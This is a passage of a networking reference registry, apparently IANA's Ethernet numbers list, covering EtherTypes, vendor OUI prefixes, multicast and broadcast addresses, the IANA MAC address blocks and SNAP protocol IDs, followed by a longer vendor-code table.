36864 9000 - - Loopback [XEROX]
36865 9001 - - 3Com(Bridge) XNS Sys Mgmt[XEROX]
36866 9002 - - 3Com(Bridge) TCP-IP Sys [XEROX]
36867 9003 - - 3Com(Bridge) loop detect [XEROX]
65280 FF00 - - BBN VITAL-LanBridge cache[XEROX]
FF00-FF0F ISC Bunker Ramo [XEROX]
65535 FFFF - - Reserved [RFC1701]
The standard for transmission of IP datagrams over Ethernets and
Experimental Ethernets is specified in [RFC894] and [RFC895]
respectively.
NOTE: Ethernet 48-bit address blocks are assigned by the IEEE.
IEEE Registration Authority
c/o Iris Ringel
IEEE Standards Department
445 Hoes Lane, P.O. Box 1331
Piscataway, NJ 08855-1331
Phone +1 732 562 3813
Fax: +1 732 562 1571
Email:
ETHERNET VENDOR ADDRESS COMPONENTS or ORGANIZATIONALLY UNIQUE IDENTIFIERS
Ethernet hardware addresses are 48 bits, expressed as 12 hexadecimal
digits (0-9, plus A-F, capitalized). These 12 hex digits consist of
the first/left 6 digits (which should match the vendor of the Ethernet
interface within the station) and the last/right 6 digits which
specify the interface serial number for that interface vendor.
These high-order 3 octets (6 hex digits) are also known as the
Organizationally Unique Identifier or OUI.
Ethernet addresses might be written unhyphenated (e.g., 123456789ABC),
or with one hyphen (e.g., 123456-789ABC), but should be written
hyphenated by octets (e.g., 12-34-56-78-9A-BC).
These addresses are physical station addresses, not multicast nor
broadcast, so the second hex digit (reading from the left) will be
even, not odd.
At present, it is not clear how the IEEE assigns Ethernet block
addresses. Whether in blocks of 2**24 or 2**25, and whether
multicasts are assigned with that block or separately. A portion of
the vendor block address is reportedly assigned serially, with the
other portion intentionally assigned randomly. If there is a global
algorithm for which addresses are designated to be physical (in a
chipset) versus logical (assigned in software), or globally-assigned
versus locally-assigned addresses, some of the known addresses do not
follow the scheme (e.g., AA0003; 02xxxx).
Another list of Ethernet vendor address components is maitained by
Michael A. Patton and is accessible at:
00000C Cisco
00000E Fujitsu
00000F NeXT
000010 Sytek
00001D Cabletron
000020 DIAB (Data Intdustrier AB)
000022 Visual Technology
00002A TRW
000032 GPT Limited (reassigned from GEC Computers Ltd)
00005A S & Koch
00005E IANA
000065 Network General
00006B MIPS
000077 Interphase Corporation
00007A Ardent
000080 Cray Communications A/S
000089 Cayman Systems Gatorbox
000093 Proteon
00009F Ameristar Technology
0000A2 Wellfleet
0000A3 Network Application Technology
0000A6 Network General (internal assignment, not for products)
0000A7 NCD X-terminals
0000A9 Network Systems
0000AA Xerox Xerox machines
0000B3 CIMLinc
0000B7 Dove Fastnet
0000BC Allen-Bradley
0000C0 Western Digital
0000C5 Farallon phone net card
0000C6 HP Intelligent Networks Operation (formerly Eon Systems)
0000C8 Altos
0000C9 Emulex Terminal Servers
0000D0 Develcon
0000D7 Dartmouth College (NED Router)
0000D8 3Com? Novell? PS/2
0000DD Gould
0000DE Unigraph
0000E2 Acer Counterpoint
0000EF Alantec
0000FD High Level Hardvare (Orion, UK)
000102 BBN BBN internal usage (not registered)
0010D1 BlazeNet
001700 Kabel
0020AF 3COM ???
0020C9 Victron
002094 Cubix
008064 Wyse Technology / Link Technologies
00802B IMAC ???
00802D Xylogics, Inc. Annex terminal servers
00808C Frontier Software Development
0080C2 IEEE 802.1 Committee
0080D3 Shiva
00A03E ATM Forum
00AA00 Intel
00DD00 Ungermann-Bass
00DD01 Ungermann-Bass
020701 Racal InterLan
020406 BBN BBN internal usage (not registered)
026086 Satelcom MegaPac (UK)
02608C 3Com IBM PC; Imagen; Valid; Cisco
02CF1F CMC Masscomp; Silicon Graphics; Prime EXL
080002 3Com (Formerly Bridge)
080003 ACC (Advanced Computer Communications)
080005 Symbolics Symbolics LISP machines
080008 BBN
080009 Hewlett-Packard
08000A Nestar Systems
08000B Unisys
080011 Tektronix, Inc.
080014 Excelan BBN Butterfly, Masscomp, Silicon Graphics
080017 NSC
08001A Data General
08001B Data General
08001E Apollo
080020 Sun Sun machines
080022 NBI
080025 CDC
080026 Norsk Data (Nord)
080027 PCS Computer Systems GmbH
080028 TI Explorer
08002B DEC
08002E Metaphor
08002F Prime Computer Prime 50-Series LHC300
080036 Intergraph CAE stations
080037 Fuji-Xerox
080038 Bull
080039 Spider Systems
080041 DCA Digital Comm. Assoc.
080045 ???? (maybe Xylogics, but they claim not to know this number)
080046 Sony
080047 Sequent
080049 Univation
08004C Encore
08004E BICC
080056 Stanford University
080058 ??? DECsystem-20
08005A IBM
080067 Comdesign
080068 Ridge
080069 Silicon Graphics
08006E Concurrent Masscomp
080075 DDE (Danish Data Elektronik A/S)
08007C Vitalink TransLAN III
080080 XIOS
080086 Imagen/QMS
080087 Xyplex terminal servers
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
080090 Retix Inc Bridges
484453 HDS ???
800010 AT&T
AA0000 DEC obsolete
AA0001 DEC obsolete
AA0002 DEC obsolete
AA0003 DEC Global physical address for some DEC machines
AA0004 DEC Local logical address for systems running
DECNET
The CFxxxx Series
RFC 2153 describes a method of usings a "pseudo OUI" for certain
purposes when there is no appropriate regular OUI assigned. These are
listed here.
CF0001 Data Comm for Business [McCain]
ETHERNET MULTICAST ADDRESSES
An Ethernet multicast address consists of the multicast bit, the
23-bit vendor component, and the 24-bit group identifier assigned by
the vendor. For example, DEC is assigned the vendor component
08-00-2B, so multicast addresses assigned by DEC have the first
24-bits 09-00-2B (since the multicast bit is the low-order bit of the
first byte, which is "the first bit on the wire").
Another list of Ethernet multicast addresses is maitained by Michael
A. Patton and is accessible at:
Ethernet Type
Address Field Usage
Multicast Addresses:
01-00-5E-00-00-00- 0800 Internet Multicast [RFC1112]
01-00-5E-7F-FF-FF
01-00-5E-80-00-00- ???? Internet reserved by IANA
01-00-5E-FF-FF-FF
01-80-C2-00-00-00 -802- Spanning tree (for bridges)
09-00-02-04-00-01? 8080? Vitalink printer
09-00-02-04-00-02? 8080? Vitalink management
09-00-09-00-00-01 8005 HP Probe
09-00-09-00-00-01 -802- HP Probe
09-00-09-00-00-04 8005? HP DTC
09-00-1E-00-00-00 8019? Apollo DOMAIN
09-00-2B-00-00-00 6009? DEC MUMPS?
09-00-2B-00-00-01 8039? DEC DSM/DTP?
09-00-2B-00-00-02 803B? DEC VAXELN?
09-00-2B-00-00-03 8038 DEC Lanbridge Traffic Monitor (LTM)
09-00-2B-00-00-04 ???? DEC MAP End System Hello
09-00-2B-00-00-05 ???? DEC MAP Intermediate System Hello
09-00-2B-00-00-06 803D? DEC CSMA/CD Encryption?
09-00-2B-00-00-07 8040? DEC NetBios Emulator?
09-00-2B-00-00-0F 6004 DEC Local Area Transport (LAT)
09-00-2B-00-00-1x ???? DEC Experimental
09-00-2B-01-00-00 8038 DEC LanBridge Copy packets
(All bridges)
09-00-2B-01-00-01 8038 DEC LanBridge Hello packets
(All local bridges)
1 packet per second, sent by the
designated LanBridge
09-00-2B-02-00-00 ???? DEC DNA Lev. 2 Routing Layer routers?
09-00-2B-02-01-00 803C? DEC DNA Naming Service Advertisement?
09-00-2B-02-01-01 803C? DEC DNA Naming Service Solicitation?
09-00-2B-02-01-02 803E? DEC DNA Time Service?
09-00-2B-03-xx-xx ???? DEC default filtering by bridges?
09-00-2B-04-00-00 8041? DEC Local Area Sys. Transport (LAST)?
09-00-2B-23-00-00 803A? DEC Argonaut Console?
09-00-4E-00-00-02? 8137? Novell IPX
09-00-56-00-00-00- ???? Stanford reserved
09-00-56-FE-FF-FF
09-00-56-FF-00-00- 805C Stanford V Kernel, version 6.0
09-00-56-FF-FF-FF
09-00-77-00-00-01 ???? Retix spanning tree bridges
09-00-7C-02-00-05 8080? Vitalink diagnostics
09-00-7C-05-00-01 8080? Vitalink gateway?
0D-1E-15-BA-DD-06 ???? HP
AB-00-00-01-00-00 6001 DEC Maintenance Operation Protocol
(MOP) Dump/Load Assistance
AB-00-00-02-00-00 6002 DEC Maintenance Operation Protocol
(MOP) Remote Console
1 System ID packet every 8-10 minutes,
by every:
DEC LanBridge
DEC DEUNA interface
DEC DELUA interface
DEC DEQNA interface
(in a certain mode)
AB-00-00-03-00-00 6003 DECNET Phase IV end node Hello
packets 1 packet every 15 seconds,
sent by each DECNET host
AB-00-00-04-00-00 6003 DECNET Phase IV Router Hello packets
1 packet every 15 seconds, sent by
the DECNET router
AB-00-00-05-00-00 ???? Reserved DEC through
AB-00-03-FF-FF-FF
AB-00-03-00-00-00 6004 DEC Local Area Transport (LAT) - old
AB-00-04-00-xx-xx ???? Reserved DEC customer private use
AB-00-04-01-xx-yy 6007 DEC Local Area VAX Cluster groups
Sys. Communication Architecture (SCA)
CF-00-00-00-00-00 9000 Ethernet Configuration Test protocol
(Loopback)
Broadcast Address:
FF-FF-FF-FF-FF-FF 0600 XNS packets, Hello or gateway search?
6 packets every 15 seconds, per XNS
station
FF-FF-FF-FF-FF-FF 0800 IP (e.g. RWHOD via UDP) as needed
FF-FF-FF-FF-FF-FF 0804 CHAOS
FF-FF-FF-FF-FF-FF 0806 ARP (for IP and CHAOS) as needed
FF-FF-FF-FF-FF-FF 0BAD Banyan
FF-FF-FF-FF-FF-FF 1600 VALID packets, Hello or gateway
search?
1 packets every 30 seconds, per VALID
station
FF-FF-FF-FF-FF-FF 8035 Reverse ARP
FF-FF-FF-FF-FF-FF 807C Merit Internodal (INP)
FF-FF-FF-FF-FF-FF 809B EtherTalk
IANA ETHERNET ADDRESS BLOCK - UNICAST USE
The IANA owns an Ethernet address block which may be used for
unicast address asignments or other special purposes.
The IANA may assign unicast global IEEE 802 MAC address from it's
assigned OUI (00-00-5E) for use in IETF standard track protocols. The
intended usage is for dynamic mapping between IP addresses and IEEE
802 MAC addresses. These IEEE 802 MAC addresses are not to be
permanently assigned to any hardware interface, nor is this a
substitute for a network equipment supplier getting its own OUI.
The address block in IEEE binary is: 0000 0000 0000 0000 0111 1010
In the normal Internet dotted decimal notation this is 0.0.94 since
the bytes are transmitted higher order first and bits within bytes are
transmitted lower order first.
IEEE CSMA/CD and Token Bus bit transmission order: 00 00 5E
IEEE Token Ring bit transmission order: 00 00 7A
Appearance on the wire (bits transmitted from left to right):
0 23 47
| | |
0000 0000 0000 0000 0111 1010 xxxx xxxx xxxx xxxx xxxx xxxx
|
Multicast Bit
Appearance in memory (bits transmitted right-to-left within octets,
octets transmitted left-to-right):
0 23 47
| | |
0000 0000 0000 0000 0101 1110 xxxx xxxx xxxx xxxx xxxx xxxx
|
Multicast Bit
The latter representation corresponds to the Internet standard
bit-order, and is the format that most programmers have to deal with.
Using this representation, the range of Internet Unicast addresses is:
00-00-5E-00-00-00 to 00-00-5E-FF-FF-FF in hex, or
0.0.94.0.0.0 to 0.0.94.255.255.255 in dotted decimal
The low order 24 bits of these unicast addresses are assigned as
follows:
Dotted Decimal Description Reference
----------------------- ------------------------------- ---------
000.000.000-000.000.255 Reserved [IANA]
000.001.000-000.001.255 Virual Router Redundancy (VRRP) [Hinden]
IANA ETHERNET ADDRESS BLOCK - MULTICAST USE
The IANA owns an Ethernet address block which may be used for
multicast address asignments or other special purposes.
The address block in IEEE binary is: 0000 0000 0000 0000 0111 1010
In the normal Internet dotted decimal notation this is 0.0.94 since
the bytes are transmitted higher order first and bits within bytes are
transmitted lower order first.
IEEE CSMA/CD and Token Bus bit transmission order: 00 00 5E
IEEE Token Ring bit transmission order: 00 00 7A
Appearance on the wire (bits transmitted from left to right):
0 23 47
| | |
1000 0000 0000 0000 0111 1010 xxxx xxx0 xxxx xxxx xxxx xxxx
| |
Multicast Bit 0 = Internet Multicast
1 = Assigned by IANA for
other uses
Appearance in memory (bits transmitted right-to-left within octets,
octets transmitted left-to-right):
0 23 47
| | |
0000 0001 0000 0000 0101 1110 0xxx xxxx xxxx xxxx xxxx xxxx
| |
Multicast Bit 0 = Internet Multicast
1 = Assigned by IANA for other uses
The latter representation corresponds to the Internet standard
bit-order, and is the format that most programmers have to deal with.
Using this representation, the range of Internet Multicast addresses
is:
01-00-5E-00-00-00 to 01-00-5E-7F-FF-FF in hex, or
1.0.94.0.0.0 to 1.0.94.127.255.255 in dotted decimal
SNAP PROTOCOL IDS IN THE IANA ETHERNET ADDRESS BLOCK
The Sub-Network Access Protocol (SNAP) header contains 40 bits: 24
bits containing an IEEE-assigned Organizationally Unique Identifier
(OUI), and 16 bits containing a Protocol Identifier (PID). The OUIs
are the same as those used in the Ethernet Vendor Address Components
list above. The IANA's OUI, 00-00-5E, may be used in SNAP headers
with the appropriate PID to identify the protocols listed below.
Note that the IANA restricts this list to protocols that are ONLY
identified in this manner; if a protocol has an EtherType, then SNAP
headers identifying that protocol must contain an OUI of 00-00-00,
with the EtherType in the PID field.
The SNAP PID assignments using the IANA's OUI are:
Protocol ID Description References
----------- ----------- ----------
decimal Hex
0001 0001 MARS Data Messages (short form) [RFC2022]
0002 0002 reserved for future NHRP use [RFC2332]
0003 0003 MARS/NHRP Control Messages [RFC2022, 2332]
0004 0004 MARS Data Messages (long form) [RFC2022]
0005 0005 SCSP - Server Cache Sync Protocol [RFC2334]
0006 0006 VRID - Virtual Router MAC Address [Knight]
0007 0007 L2TP [RFC3070]
0008 0008 Virtual Private Network ID [Malis-ID]
0009 0009 MSDP-GRE-Protocol Type [msdp-ID]
Vendor Codes For EtherNet Interfaces :-
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000009 powerpipes?
00000C Cisco
00000E Fujitsu
00000F NeXT
000010 Hughes LAN Systems (formerly Sytek)
000011 Tektronix
000015 Datapoint Corporation
000018 Webster Computer Corporation Appletalk/Ethernet Gateway
00001A AMD (?)
00001B Novell (now Eagle Technology)
00001C JDR Microdevices generic, NE2000 drivers
00001D Cabletron
00001F Cryptall Communications Corp.
000020 DIAB (Data Intdustrier AB)
000021 SC&C (PAM Soft&Hardware also reported)
000022 Visual Technology
000023 ABB Automation AB, Dept. Q
000024 Olicom
000029 IMC
00002A TRW
00002C NRC - Network Resources Corporation - MultiGate Hub1+, Hub2, etc
000032 GPT Limited (reassigned from GEC Computers Ltd)
000037 Oxford Metrics Ltd
00003B Hyundai/Axil Sun clones
00003C Auspex
00003D AT&T
00003F Syntrex Inc
000044 Castelle
000046 ISC-Bunker Ramo, An Olivetti Company
000048 Epson
000049 Apricot Ltd.
00004B APT -ICL also reported
00004C NEC Corporation
00004F Logicraft 386-Ware P.C. Emulator
000051 Hob Electronic Gmbh & Co. KG
000052 Optical Data Systems
000055 AT&T
000058 Racore Computer Products Inc
00005A SK (Schneider & Koch in Europe and Syskonnect outside of Europe)
00005A Xerox 806 (unregistered)
00005B Eltec
00005D RCE
00005E U.S. Department of Defense (IANA)
00005F Sumitomo
000061 Gateway Communications
000062 Honeywell
000063 Hewlett-Packard LanProbe
000064 Yokogawa Digital Computer Corp
000065 Network General
000066 Talaris
000068 Rosemount Controls
000069 Concord Communications, Inc (although someone said Silicon Graphics)
00006B MIPS
00006D Case
00006E Artisoft, Inc.
00006F Madge Networks Ltd. Token-ring adapters
000073 DuPont
000075 Bell Northern Research (BNR)
000077 Interphase [Used in other systems, e.g. MIPS, Motorola]
000078 Labtam Australia
000079 Networth Incorporated [bought by Compaq, used in Netelligent series]
00007A Ardent
00007B Research Machines
00007D Cray Research Superservers,Inc [Also Harris (3M) (old)]
00007E NetFRAME multiprocessor network servers
00007F Linotype-Hell AG Linotronic typesetters
000080 Cray Communications (formerly Dowty Network Services) [Also shows as "Harris (3M) (new)" and/or "Imagen(?)" elsewhere]
000081 Synoptics
000083 Tadpole Technology [had Optical Data Systems which is wrong according to both]
000084 Aquila (?), ADI Systems Inc.(?)
000086 Gateway Communications Inc. (then Megahertz & now 3com)
000087 Hitachi
000089 Cayman Systems Gatorbox
00008A Datahouse Information Systems
00008E Solbourne(?), Jupiter(?) (I've had confirming mail on Solbourne)
000092 Unisys, Cogent (both reported)
000093 Proteon
000094 Asante MAC
000095 Sony/Tektronix
000097 Epoch
000098 Cross Com
000099 Memorex Telex Corporations
00009F Ameristar Technology
0000A0 Sanyo Electronics
0000A2 Wellfleet
0000A3 Network Application Technology (NAT)
0000A4 Acorn
0000A5 Compatible Systems Corporation
0000A6 Network General (internal assignment, not for products)
0000A7 Network Computing Devices (NCD) X-terminals
0000A8 Stratus Computer, Inc.
0000A9 Network Systems
0000AA Xerox Xerox machines
0000AC Conware Netzpartner [had Apollo, claimed incorrect]
0000AE Dassault Automatismes et Telecommunications
0000AF Nuclear Data Acquisition Interface Modules (AIM)
0000B0 RND (RAD Network Devices)
0000B1 Alpha Microsystems Inc.
0000B3 CIMLinc
0000B4 Edimax
0000B5 Datability Terminal Servers
0000B6 Micro-matic Research
0000B7 Dove Fastnet
0000BB TRI-DATA Systems Inc. Netway products, 3274 emulators
0000BC Allen-Bradley
0000C0 Western Digital now SMC (Std. Microsystems Corp.)
0000C1 Olicom A/S
0000C5 Farallon Computing Inc
0000C6 HP Intelligent Networks Operation (formerly Eon Systems)
0000C8 Altos
0000C9 Emulex Terminal Servers, Print Servers
0000CA LANcity Cable Modems (now owned by BayNetworks)
0000CC Densan Co., Ltd.
0000CD Industrial Research Limited
0000D0 Develcon Electronics, Ltd.
0000D1 Adaptec, Inc. "Nodem" product
0000D2 SBE Inc
0000D3 Wang Labs
0000D4 PureData
0000D7 Dartmouth College (NED Router)
0000D8 old Novell NE1000's (before about 1987?) (also 3Com)
0000DD Gould
0000DE Unigraph
0000E1 Hitachi (laptop built-in)
0000E2 Acer Counterpoint
0000E3 Integrated Micro Products Ltd
0000E4 mips?
0000E6 Aptor Produits De Comm Indust
0000E8 Accton Technology Corporation
0000E9 ISICAD, Inc.
0000ED April
0000EE Network Designers Limited [also KNX Ltd, a former division]
0000EF Alantec (now owned by ForeSystems)
0000F0 Samsung
0000F2 Spider Communications (Montreal, not Spider Systems)
0000F3 Gandalf Data Ltd. - Canada
0000F4 Allied Telesis, Inc.
0000F6 A.M.C. (Applied Microsystems Corp.)
0000F8 DEC
0000FB Rechner zur Kommunikation
0000FD High Level Hardware (Orion, UK)
0000FF Camtec Electronics (UK) Ltd.
000102 BBN (Bolt Beranek and Newman, Inc.) internal usage (not registered)
000143 IEEE 802
000150 Megahertz (now 3com) modem
000163 NDC (National Datacomm Corporation)
000168 W&G (Wandel & Goltermann) [incorrect according to W&G]
0001C8 Thomas Conrad Corp.
0001FA Compaq (PageMarq printers)
000204 Novell NE3200
000205 Hamilton (Sparc Clones)
000216 ESI (Extended Systems, Inc) print servers
000288 Global Village (PCcard in Mac portable)
0003C6 Morning Star Technologies Inc
000400 Lexmark (Print Server)
0004AC IBM PCMCIA Ethernet adapter.
000502 Apple (PCI bus Macs)
00059A PowerComputing (Mac clone)
0005A8 PowerComputing Mac clones
00060D Hewlett-Packard JetDirect token-ring interfaces
000629 IBM RISC6000 system
00067C Cisco
0006C1 Cisco
000701 Racal-Datacom
00070D Cisco 2511 Token Ring
000852 Technically Elite Concepts
000855 Fermilab
0008C7 Compaq
001007 Cisco Systems Catalyst 1900
00100B Cisco Systems
00100D Cisco Systems Catalyst 2924-XL
001011 Cisco Systems Cisco 75xx
00101F Cisco Systems Catalyst 2901
001029 Cisco Systems Catalyst 5000
00102F Cisco Systems Cisco 5000
00104B 3Com 3C905-TX PCI
00105A 3Com Fast Etherlink XL in a Gateway 2000
001060 Billington Novell NE200 Compatible
001079 Cisco 5500 Router
00107A Ambicom (was Tandy?)
00107B Cisco Systems
001083 HP-UX E 9000/889
0010A4 Xircom RealPort 10/100 PC Card
0010A6 Cisco
0010D7 Argosy EN 220 Fast Ethernet PCMCIA
0010F6 Cisco
001700 Kabel
002000 Lexmark (Print Server)
002005 simpletech
002008 Cable & Computer Technology
00200C Adastra Systems Corp
002011 Canopus Co Ltd
002017 Orbotech
002018 Realtek
00201A Nbase
002025 Control Technology Inc (Industrial Controls and Network Interfaces)
002028 Bloomberg
002029 TeleProcessing CSU/DSU (now owned by ADC/Kentrox)
00202B ATML (Advanced Telecommunications Modules, Ltd.)
002035 IBM (International Business Machines) mainframes, Etherjet printers
002036 BMC Software
002042 Datametrics Corp
002045 SolCom Systems Limited
002048 Fore Systems Inc
00204B Autocomputer Co Ltd
00204C Mitron Computer Pte Ltd
002056 Neoproducts
002061 Dynatech Communications Inc
002063 Wipro Infotech Ltd
002066 General Magic Inc
002067 Node Runner Inc
00206B Minolta Co., Ltd Network printers
002078 Runtop Inc
002085 3COM SuperStack II UPS management module
00208A Sonix Communications Ltd
00208B Focus Enhancements
00208C Galaxy Networks Inc
002094 Cubix Corporation
0020A5 Newer Technology
0020A6 Proxim Inc
0020A7 Pairgain Technologies, Inc.
0020AF 3COM Corporation
0020B2 CSP (Printline Multiconnectivity converter)
0020B6 Agile Networks Inc
0020B9 Metricom, Inc.
0020C5 Eagle NE2000
0020C6 NECTEC
0020D0 Versalynx Corp. "The One Port" terminal server
0020D2 RAD Data Communications Ltd
0020D3 OST (Ouet Standard Telematique)
0020D8 NetWave
0020DA Xylan
0020DC Densitron Taiwan Ltd
0020E0 PreMax PE-200 (PCMCIA NE2000-clone card, sold by InfoExpress)
0020E5 Apex Data
0020EE Gtech Corporation
0020F6 Net Tek & Karlnet Inc
0020F8 Carrera Computers Inc
0020FC Matrox
004001 Zero One Technology Co Ltd (ZyXEL?)
004005 TRENDware International Inc.; Linksys; Simple Net; all three reported
004009 Tachibana Tectron Co Ltd
00400B Crescendo (now owned by Cisco)
00400C General Micro Systems, Inc.
00400D LANNET Data Communications
004010 Sonic Mac Ethernet interfaces
004011 Facilities Andover Environmental Controllers
004013 NTT Data Communication Systems Corp
004014 Comsoft Gmbh
004015 Ascom
004017 XCd XJet - HP printer server card
00401C AST Pentium/90 PC (emulating AMD EISA card)
00401F Colorgraph Ltd
004020 Pilkington Communication
004023 Logic Corporation
004025 Molecular Dynamics
004026 Melco Inc
004027 SMC Massachusetts [Had:Sigma (?), maybe the "S"?]
004028 Netcomm
00402A Canoga-Perkins
00402B TriGem
00402F Xlnt Designs Inc (XDI)
004030 GK Computer
004032 Digital Communications
004033 Addtron Technology Co., Ltd.
004036 TribeStar
004039 Optec Daiichi Denko Co Ltd
00403C Forks, Inc.
004041 Fujikura Ltd.
004043 Nokia Data Communications
004048 SMD Informatica S.A.
00404C Hypertec Pty Ltd.
00404D Telecomm Techniques
00404F Space & Naval Warfare Systems
004050 Ironics, Incorporated
004052 Star Technologies Inc
004053 Datum [Bancomm Division] TymServe 2000
004054 Thinking Machines Corporation
004057 Lockheed-Sanders
004059 Yoshida Kogyo K.K.
00405B Funasset Limited
00405D Star-Tek Inc
004066 Hitachi Cable, Ltd.
004067 Omnibyte Corporation
004068 Extended Systems
004069 Lemcom Systems Inc
00406A Kentek Information Systems Inc
00406E Corollary, Inc.
00406F Sync Research Inc
004072 Applied Innovation
004074 Cable and Wireless
004076 AMP Incorporated
004078 Wearnes Automation Pte Ltd
00407F Agema Infrared Systems AB
004082 Laboratory Equipment Corp
004085 SAAB Instruments AB
004086 Michels & Kleberhoff Computer
004087 Ubitrex Corporation
004088 Mobuis NuBus (Mac) combination video/EtherTalk
00408A TPS Teleprocessing Sys. Gmbh
00408C Axis Communications AB
00408E CXR/Digilog
00408F WM-Data Minfo AB
004090 Ansel Communications PC NE2000 compatible twisted-pair ethernet cards
004091 Procomp Industria Eletronica
004092 ASP Computer Products, Inc.
004094 Shographics Inc
004095 Eagle Technologies [UMC also reported]
004096 Telesystems SLW Inc
00409A Network Express Inc
00409C Transware
00409D DigiBoard Ethernet-ISDN bridges
00409E Concurrent Technologies Ltd.
00409F Lancast/Casat Technology Inc
0040A4 Rose Electronics
0040A6 Cray Research Inc.
0040AA Valmet Automation Inc
0040AD SMA Regelsysteme Gmbh
0040AE Delta Controls, Inc.
0040AF Digital Products, Inc. (DPI).
0040B4 3COM K.K.
0040B5 Video Technology Computers Ltd
0040B6 Computerm Corporation
0040B9 MACQ Electronique SA
0040BD Starlight Networks Inc
0040C1 Bizerba-Werke Wilheim Kraut
0040C2 Applied Computing Devices
0040C3 Fischer and Porter Co.
0040C5 Micom Communications Corp.
0040C6 Fibernet Research, Inc.
0040C7 Danpex Corporation
0040C8 Milan Technology Corp.
0040CC Silcom Manufacturing Technology Inc
0040CF Strawberry Tree Inc
0040D0 DEC/Compaq
0040D2 Pagine Corporation
0040D4 Gage Talker Corp.
0040D7 Studio Gen Inc
0040D8 Ocean Office Automation Ltd
0040DC Tritec Electronic Gmbh
0040DF Digalog Systems, Inc.
0040E1 Marner International Inc
0040E2 Mesa Ridge Technologies Inc
0040E3 Quin Systems Ltd
0040E5 Sybus Corporation
0040E7 Arnos Instruments & Computer
0040E9 Accord Systems, Inc.
0040EA PlainTree Systems Inc
0040ED Network Controls International Inc
0040F0 Micro Systems Inc
0040F1 Chuo Electronics Co., Ltd.
0040F4 Cameo Communications, Inc.
0040F5 OEM Engines
0040F6 Katron Computers Inc
0040F9 Combinet
0040FA Microboards Inc
0040FB Cascade Communications Corp.
0040FD LXE
0040FF Telebit Corporation Personal NetBlazer
004854 Digital SemiConductor 21143/2 based 10/100
004F49 Realtek
004F4B Pine Technology Ltd.
005004 3com 3C90X
00500F Cisco
00504D Repotec Group
00504E UMC UM9008 NE2000-compatible ISA Card for PC
005050 Cisco
005069 PixStream Incorporated
0050BD Cisco
0050E2 Cisco
005500 Xerox
006008 3Com 3Com PCI form factor 3C905 TX board
006009 Cisco Catalyst 5000 Ethernet switch
006025 Active Imaging Inc.
00602F Cisco
006030 VillageTronic used on Amiga
00603E Cisco 100Mbps interface
006047 Cisco
00604E Cycle Computer (Sun MotherBoard Replacements)
006052 Realtek (RTL 8029 == PCI NE2000)
00605C Cisco
006067 Acer Lan
006070 Cisco routers (2524 and 4500)
006083 Cisco Systems, Inc. 3620/3640 routers
00608C 3Com (1990 onwards)
006094 AMD PCNET PCI
006097 3Com
0060B0 Hewlett-Packard
0060F5 Phobos FastEthernet for Unix WS
008000 Multitech Systems Inc
008001 Periphonics Corporation
008004 Antlow Computers, Ltd.
008005 Cactus Computer Inc.
008006 Compuadd Corporation
008007 Dlog NC-Systeme
008009 Jupiter Systems (older MX-600 series machines)
00800D Vosswinkel FU
00800F SMC (Standard Microsystem Corp.)
008010 Commodore
008012 IMS Corp. IMS failure analysis tester
008013 Thomas Conrad Corp.
008015 Seiko Systems Inc
008016 Wandel & Goltermann
008017 PFU
008019 Dayna Communications "Etherprint" product
00801A Bell Atlantic
00801B Kodiak Technology
00801C Cisco
008021 Newbridge Networks Corporation
008023 Integrated Business Networks
008024 Kalpana
008026 Network Products Corporation
008029 Microdyne Corporation
00802A Test Systems & Simulations Inc
00802C The Sage Group PLC
00802D Xylogics, Inc. Annex terminal servers
00802E Plexcom, Inc.
008033 Formation (?)
008034 SMT-Goupil
008035 Technology Works
008037 Ericsson Business Comm.
008038 Data Research & Applications
00803B APT Communications, Inc.
00803D Surigiken Co Ltd
00803E Synernetics
00803F Hyundai Electronics
008042 Force Computers
008043 Networld Inc
008045 Matsushita Electric Ind Co
008046 University of Toronto
008048 Compex, used by Commodore and DEC at least
008049 Nissin Electric Co Ltd
00804C Contec Co., Ltd.
00804D Cyclone Microsystems, Inc.
008051 ADC Fibermux
008052 Network Professor
008057 Adsoft Ltd
00805A Tulip Computers International BV
00805B Condor Systems, Inc.
00805C Agilis(?)
00805F Compaq Computer Corporation
008060 Network Interface Corporation
008062 Interface Co.
008063 Richard Hirschmann Gmbh & Co
008064 Wyse
008067 Square D Company
008069 Computone Systems
00806A ERI (Empac Research Inc.)
00806B Schmid Telecommunication
00806C Cegelec Projects Ltd
00806D Century Systems Corp.
00806E Nippon Steel Corporation
00806F Onelan Ltd
008071 SAI Technology
008072 Microplex Systems Ltd
008074 Fisher Controls
008079 Microbus Designs Ltd
00807B Artel Communications Corp.
00807C FiberCom
00807D Equinox Systems Inc
008082 PEP Modular Computers Gmbh
008086 Computer Generation Inc.
008087 Okidata
00808A Summit (?)
00808B Dacoll Limited
00808C Netscout Systems (formerly Frontier Software Development)
00808D Westcove Technology BV
00808E Radstone Technology
008090 Microtek International Inc
008092 Japan Computer Industry, Inc.
008093 Xyron Corporation
008094 Sattcontrol AB
008096 HDS (Human Designed Systems) X terminals
008098 TDK Corporation
00809A Novus Networks Ltd
00809B Justsystem Corporation
00809D Datacraft Manufactur'g Pty Ltd
00809F Alcatel Business Systems
0080A1 Microtest
0080A3 Lantronix (see also 0800A3)
0080A6 Republic Technology Inc
0080A7 Measurex Corp
0080AD CNet Technology Used by Telebit (among others)
0080AE Hughes Network Systems
0080AF Allumer Co., Ltd.
0080B1 Softcom A/S
0080B2 NET (Network Equipment Technologies)
0080B6 Themis corporation
0080BA Specialix (Asia) Pte Ltd
0080C0 Penril Datability Networks
0080C2 IEEE 802.1 Committee
0080C6 Soho
0080C7 Xircom, Inc.
0080C8 D-Link (also Solectek Pocket Adapters, and LinkSys PCMCIA)
0080C9 Alberta Microelectronic Centre
0080CE Broadcast Television Systems
0080D0 Computer Products International
0080D3 Shiva Appletalk-Ethernet interface
0080D4 Chase Limited
0080D6 Apple Mac Portable(?)
0080D7 Fantum Electronics
0080D8 Network Peripherals
0080DA Bruel & Kjaer
0080E0 XTP Systems Inc
0080E3 Coral (?)
0080E7 Lynwood Scientific Dev Ltd
0080EA The Fiber Company
0080F0 Kyushu Matsushita Electric Co
0080F1 Opus
0080F3 Sun Electronics Corp
0080F4 Telemechanique Electrique
0080F5 Quantel Ltd
0080F7 Zenith Communications Products
0080FB BVM Limited
0080FE Azure Technologies Inc
009004 3Com
009027 Intel
0090B1 Cisco
00902B Cisco Ethernet Switches and Light Streams
009086 Cisco
009092 Cisco
0090AB Cisco
0090B1 Cisco
0090F2 Cisco Ethernet Switches and Light Streams
00A000 Bay Networks Ethernet switch
00A00C Kingmax Technology Inc. PCMCIA card
